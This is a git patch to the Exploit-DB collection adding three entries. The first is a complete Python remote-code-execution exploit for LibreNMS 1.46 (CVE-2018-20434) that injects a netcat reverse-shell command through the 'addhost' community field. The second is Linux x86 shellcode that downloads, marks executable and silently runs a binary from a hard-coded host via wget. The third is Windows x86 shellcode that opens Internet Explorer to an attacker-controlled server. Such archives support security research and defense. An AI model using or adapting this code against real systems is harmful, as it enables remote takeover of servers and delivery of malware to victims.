From 70484f5916093176a5e2da335c9249be78f893b5 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 29 Jun 2019 05:01:51 +0000 Subject: [PATCH] DB: 2019-06-29 3 changes to exploits/shellcodes LibreNMS 1.46 - 'addhost' Remote Code Execution Windows/x86 - Start iexplore.exe Shellcode (191 Bytes) Linux/x86 - chmod + execute + hide output via /usr/bin/wget Shellcode (129 bytes) --- exploits/php/webapps/47044.py | 111 ++++++++++++++++++++++++++++++++ files_exploits.csv | 1 + files_shellcodes.csv | 2 + shellcodes/linux_x86/47043.c | 113 +++++++++++++++++++++++++++++++++ shellcodes/windows_x86/47042.c | 66 +++++++++++++++++++ 5 files changed, 293 insertions(+) create mode 100755 exploits/php/webapps/47044.py create mode 100644 shellcodes/linux_x86/47043.c create mode 100644 shellcodes/windows_x86/47042.c diff --git a/exploits/php/webapps/47044.py b/exploits/php/webapps/47044.py new file mode 100755 index 000000000..17ae8afb0 --- /dev/null +++ b/exploits/php/webapps/47044.py @@ -0,0 +1,111 @@ +#!/usr/bin/python + +''' +# Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution +# Date: 24/12/2018 +# Exploit Author: Askar (@mohammadaskar2) +# CVE : CVE-2018-20434 +# Vendor Homepage: https://www.librenms.org/ +# Version: v1.46 +# Tested on: Ubuntu 18.04 / PHP 7.2.10 +''' + +import requests +from urllib import urlencode +import sys + +if len(sys.argv) != 5: + print "[!] Usage : ./exploit.py http://www.example.com cookies rhost rport" + sys.exit(0) + +# target (user input) +target = sys.argv[1] + +# cookies (user input) +raw_cookies = sys.argv[2] + +# remote host to connect to +rhost = sys.argv[3] + +# remote port to connect to +rport = sys.argv[4] + +# hostname to use (change it if you want) +hostname = "dummydevice" + +# payload to create reverse shell +payload = "'$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f) #".format(rhost, rport) + +# request headers +headers = { + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101" + } + +# request cookies +cookies = {} +for cookie in raw_cookies.split(";"): + # print cookie + c = cookie.split("=") + cookies[c[0]] = c[1] + + +def create_new_device(url): + raw_request = { + "hostname": hostname, + "snmp": "on", + "sysName": "", + "hardware": "", + "os": "", + "snmpver": "v2c", + "os_id": "", + "port": "", + "transport": "udp", + "port_assoc_mode": "ifIndex", + "community": payload, + "authlevel": "noAuthNoPriv", + "authname": "", + "authpass": "", + "cryptopass": "", + "authalgo": "MD5", + "cryptoalgo": "AES", + "force_add": "on", + "Submit": "" + } + full_url = url + "/addhost/" + request_body = urlencode(raw_request) + + # send the device creation request + request = requests.post( + full_url, data=request_body, cookies=cookies, headers=headers + ) + text = request.text + if "Device added" in text: + print "[+] Device Created Sucssfully" + return True + else: + print "[-] Cannot Create Device" + return False + + +def request_exploit(url): + params = { + "id": "capture", + "format": "text", + "type": "snmpwalk", + "hostname": hostname + } + + # send the payload call + request = requests.get(url + "/ajax_output.php", + params=params, + headers=headers, + cookies=cookies + ) + text = request.text + if rhost in text: + print "[+] Done, check your nc !" + + +if create_new_device(target): + request_exploit(target) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 6088ddacd..1dd487cd1 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -41438,3 +41438,4 @@ id,file,description,date,author,type,platform,port 47035,exploits/aspx/webapps/47035.py,"BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal",2019-06-25,"Aaron Bishop",webapps,aspx, 47036,exploits/php/webapps/47036.txt,"WordPress Plugin iLive 1.0.4 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php, 47037,exploits/php/webapps/47037.txt,"WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php, +47044,exploits/php/webapps/47044.py,"LibreNMS 1.46 - 'addhost' Remote Code Execution",2019-06-28,Askar,webapps,php,80 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 7691aa1a8..8643cb2d3 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -974,3 +974,5 @@ id,file,description,date,author,type,platform 47025,shellcodes/linux_x86-64/47025.c,"Linux/x86_64 - Reverse (0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode",2019-06-24,"Aron Mihaljevic",shellcode,linux_x86-64 47040,shellcodes/linux_x86/47040.py,"Linux/x86 - ASCII AND_ SUB_ PUSH_ POPAD Encoder Shellcode",2019-06-27,"Petr Javorik",shellcode,linux_x86 47041,shellcodes/windows_x86/47041.c,"Windows/x86 - bitsadmin Download and Execute (http://192.168.10.10/evil.exe _c:\evil.exe_) Shellcode (210 Bytes)",2019-06-27,"Joseph McDonagh",shellcode,windows_x86 +47042,shellcodes/windows_x86/47042.c,"Windows/x86 - Start iexplore.exe Shellcode (191 Bytes)",2019-06-28,"Joseph McDonagh",shellcode,windows_x86 +47043,shellcodes/linux_x86/47043.c,"Linux/x86 - chmod + execute + hide output via /usr/bin/wget Shellcode (129 bytes)",2019-06-28,LockedByte,shellcode,linux_x86 diff --git a/shellcodes/linux_x86/47043.c b/shellcodes/linux_x86/47043.c new file mode 100644 index 000000000..8e38935b8 --- /dev/null +++ b/shellcodes/linux_x86/47043.c @@ -0,0 +1,113 @@ +/** + +; Shellcode 129 Bytes +; download (via wget) + chmod + execute shellcode + hide output +; Exec: /usr/bin/wget http://192.168.1.93//x > /dev/null 2>&1 +; + +global _start + +section .text + +_start: + + ;fork + xor eax,eax + mov al,0x2 + int 0x80 + xor ebx,ebx + cmp eax,ebx + jz download + + ; wait(NULL) + xor eax,eax + mov al,0x7 + int 0x80 + + ; give execution permissions to the binary x + xor ecx,ecx + xor eax, eax + push eax + mov al, 0xf + push 0x78 + mov ebx, esp + xor ecx, ecx + mov cx, 0x1ff + int 0x80 + + ; execution of binary x + xor eax, eax + push eax + push 0x78 + mov ebx, esp + push eax + mov edx, esp + push ebx + mov ecx, esp + mov al, 11 + int 0x80 + +download: + + push 0xb + pop eax + cdq + push edx + ; download uri + mov eax, 0x31263e32 ; 1&>2 hide_output[4] + mov eax, 0x6c6c756e ; llun/ hide_output[3] + mov eax, 0x2f766564 ; ved hide_output[2] + mov eax, 0x2f3e20 ; /> hide_output[1] + mov eax, 0x782f2f ; x// path[1] + mov eax, 0x33392e31 ;93.1 addr[3] + mov eax, 0x2e383631 ;.861 addr[2] + mov eax, 0x2e323931 ;.291 addr[1] + push eax + mov ecx,esp + push edx + + ; download execution in /usr/bin/wget + + push 0x74 ;t + push 0x6567772f ;egw/ + push 0x6e69622f ;nib/ + push 0x7273752f ;rsu/ + mov ebx,esp + push edx + push ecx + push ebx + mov ecx,esp + int 0x80 + +**/ + +// nasm -felf32 wget.nasm -o wget.o +// ld -m elf_i386 wget.o -o wget + +#include +#include + +// gcc -z execstack -fno-stack-protector shellcode.c -o shellcode + +// SHELLCODE 129 Bytes + +char buf[] = "\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8" +"\x74\x2a\x31\xc0\xb0\x07\xcd\x80\x31\xc9" +"\x31\xc0\x50\xb0\x0f\x6a\x78\x89\xe3\x31" +"\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50" +"\x6a\x78\x89\xe3\x50\x89\xe2\x53\x89\xe1" +"\xb0\x0b\xcd\x80\x6a\x0b\x58\x99\x52\xb8" +"\x32\x3e\x26\x31\xb8\x6e\x75\x6c\x6c\xb8" +"\x64\x65\x76\x2f\xb8\x20\x3e\x2f\x00\xb8" +"\x2f\x2f\x78\x00\xb8\x31\x2e\x39\x33\xb8" +"\x31\x36\x38\x2e\xb8\x31\x39\x32\x2e\x50" +"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65" +"\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72" +"\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"; + +void main(int argc, char **argv) +{ + int (*func)(); + func = (int (*)()) buf; + (int)(*func)(); +} \ No newline at end of file diff --git a/shellcodes/windows_x86/47042.c b/shellcodes/windows_x86/47042.c new file mode 100644 index 000000000..e100ae39f --- /dev/null +++ b/shellcodes/windows_x86/47042.c @@ -0,0 +1,66 @@ +/* +# Title: start iexplore.exe +# Author: Joseph McDonagh +# Shellcode length 191 +# Could be smaller if the app your are exploiting loads msvcrt. +# Purpose: Use the start command to open internet explorer and connect to a malicious web server +# The command this runs is simply start iexplore.exe http://192.168.10.10/ (Attacker controlled server), which can lead to a more productive payload. +# This code can exploit browser vulnerabilities without (or with) social engineering. +# Tested on: WinXP SP 2 +# Thanks to Kartik Durg and sharing the shellcode entry 46281 and sharing the details on the iamroot blog https://iamroot.blog/2019/01/28/windows-shellcode-download-and-execute-payload-using-msiexec/. This got me going in the right direction. And to POB. Using "start" is helpful for this type of payload. +# Complile on Kali #i686-w64-mingw32-gcc sie.c -o sie.exe +# + +***** Assembly code follows ***** + +; The portion loads msvcrt to make the syscall. +; Hardcoded for winxp + +xor eax, eax +mov ax, 0x7472 +push eax +push dword 0x6376736d +push esp + +; LoadLibrary (hardcoded for Windows XP. +; Can find this on a debugger or arwin) +mov ebx, 0x7c801d77 +call ebx +mov ebp, eax + +xor eax, eax +PUSH eax ; null terminator +push 0x2f30312e ; /10. +push 0x30312e38 ; 01.8 +push 0x36312e32 ; 61.2 +push 0x39312f2f ; 91// +push 0x3a707474 ; :ptt +push 0x68206578 ; h ex +push 0x652e6572 ; e.er +push 0x6f6c7078 ; olpx +push 0x65692074 ; ei t +push 0x72617473 ; rats + +; Below code moves the pointer and executes the system call that runs the command. + +mov edi,esp +push edi +mov eax, 0x77c293c7 +call eax + +xor eax, eax +push eax +mov eax, 0x7c81caa2 +call eax +*/ + +char code[]= + +"\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x77\x1d\x80\x7c\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x31\x30\x2f\x68\x38\x2e\x32\x36\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x78\x65\x20\x68\x68\x72\x65\x2e\x65\x68\x78\x70\x6c\x6f\x68\x74\x20\x69\x65\x68\x73\x74\x61\x72\x89\xe7\x57\xb8\xc7\x93\xc2\x77\xff\xd0\x31\xc0\x50\xb8\xa2\xca\x81\x7c\xff\xd0"; + +int main(int argc, char **argv) + { +int (*func)(); +func = (int (*)()) code; +(int)(*func)(); +} \ No newline at end of file